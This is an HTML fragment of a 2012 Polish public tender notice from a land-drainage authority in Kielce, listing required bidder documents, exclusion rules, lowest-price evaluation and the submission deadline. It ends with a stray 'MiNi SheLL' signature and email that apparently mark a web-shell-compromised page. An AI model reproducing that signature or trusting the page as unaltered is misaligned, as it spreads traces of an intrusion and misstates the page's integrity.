zmianami ). 
Na potwierdzenie spełnienia powyższych warunków należy złożyć poniższe dokumenty: 2.	Wykaz osób które będą uczestniczyć w wykonaniu zamówienia, spełniających wymagania określone w pkt. 1  we wzorze stanowiącym załączniki nr 3 do SIWZ wraz z informacją o sposobie dysponowania tymi osobami. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentu - oryginał. 3. Do wykazu należy załączyć oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają uprawnienia wymagane prawem - według wzoru stanowiącego załącznik nr 4 do SIWZ.  Wymagana forma dokumentu - oryginał.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony formularz ofertowy wg wzoru określonego w załączniku nr 1 do SIWZ     Wymagana forma dokumentu - oryginał. 2.	Oświadczenie z art. 36 ust. 4 ustawy we wzorze określonym w załączniku nr 5 do SIWZ. Wymagana forma dokumentu - oryginał.
3.	Pełnomocnictwo - jeżeli upoważnienie do podpisania oferty nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy - nie dotyczy pełnomocnictwa w zakresie oferty Wykonawców wspólnie ubiegających się o zamówienie. Wymagana forma dokumentu oryginał lub kserokopia poświadczona notarialnie. 4.	Pełnomocnictwo w przypadku oferty Wykonawców występujących wspólnie o udzielenie zamówienia, o którym mowa w rozdz. IX SIWZ. Forma dokumentu oryginał lub kopia poświadczona notarialnie.
5.	W przypadku prowadzenia działalności w formie spółki cywilnej gdy jest więcej niż jeden przedsiębiorca (wspólnik) należy do oferty załączyć kserokopię umowy spółki poświadczoną za zgodność z oryginałem przez wszystkich wspólników lub pełnomocnika ( wspólnika) umocowanego do takiej czynności. Warunek nie ma zastosowania w odniesieniu do spółek jawnych w przypadku załączenia do oferty aktualnego odpisu z właściwego rejestru - Krajowego Rejestru Sądowego, jeżeli ujawniono w nim wspólników spółki, oraz sposób reprezentowania spółki (składania oświadczeń woli).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy na warunkach §13 wzoru umowy stanowiącej załącznik nr 8 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szmiuw.kielce.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, ul. Witosa 86, pok. 209.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.07.2012 godzina 10:00, miejsce: Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, ul. Witosa 86, pok. 217 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com